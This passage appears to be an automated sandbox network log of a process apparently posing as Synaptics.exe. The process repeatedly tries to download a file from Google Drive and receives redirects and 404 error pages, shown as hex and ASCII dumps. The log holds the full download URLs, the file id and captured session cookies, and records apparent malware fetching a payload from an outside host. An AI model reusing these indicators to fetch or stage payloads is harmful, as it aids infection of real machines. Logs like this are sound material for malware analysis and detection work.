                                                                                                                    2024-12-30 10:25:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5D8s9HxmvRkEX0pER7nT_KDVZ40S1TIcqBlNV8dh3kWmnCCoFV5Krjhsd0YLqZY7p2DTaQ6GA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yoGInZjpuifgIy7IDqluTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 42 79 51 61 41 49 66 72 58 49 39 5f 78 75 4c 32 47 57 55 6c 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="CByQaAIfrXI9_xuL2GWUlg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.949796142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                                                                                                                    2024-12-30 10:25:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ScDfgB-MVcBtld_CLgJxjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.949797142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7HLcXAnLhbSjbjNmiLiZhqJCAW3apfWCgKID1LuO7mF3_MvUaK-Kv2rckeaxxHGTNz
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WuPte8BSiBUZM7b3U4OdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:40 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:40 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 4f 31 6b 4b 6b 72 6e 34 65 2d 44 63 31 4e 36 4c 33 51 6c 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="YO1kKkrn4e-Dc1N6L3QlCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:40 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    49192.168.2.949800142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    50192.168.2.949801142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6s-smCQ2SFdiS79T0-Ml63D3J7vPBoZHg5H51upU3KPsEyt0nZLwxm2HA-WKo_PEAn
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hMGxaJ4cc4xrVKianJBeGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:41 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 54 51 47 74 56 75 49 74 7a 6d 41 57 35 7a 6a 59 4e 6c 61 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="hTQGtVuItzmAW5zjYNlacw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    51192.168.2.949802142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:40 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:40 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fAwoJw2cvzNLrx0udT3LdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    52192.168.2.949804142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:41 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GeADDF2jtnTOSWuNvVSCBUVCQnLIcC2R3xhTPQcEUg_sy0h2efNq5EbCIJwEgYKOk8wak7YBLsqRj7pZl4VgPuwmUExArEOffpmBGDOe1qdVhzzSDux5QFLM1QvX9N7NIVNWVpDS373hXDW_fH-Xz-188HVH7PVlbDTB7CfGt-x6CO33xt-VNJP4
                                                                                                                    2024-12-30 10:25:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hIJVtt6jCeEuRcWJmNP_4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    53192.168.2.949806142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:42 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4P9dcb7zks9tzVGlzBslFDu6BY9eKd5ugppUK_SfkWdjlEfBfxKotPXYzIVfordHgI
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:41 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-mFVecKSr9t1hr-4WwhYNCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:42 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
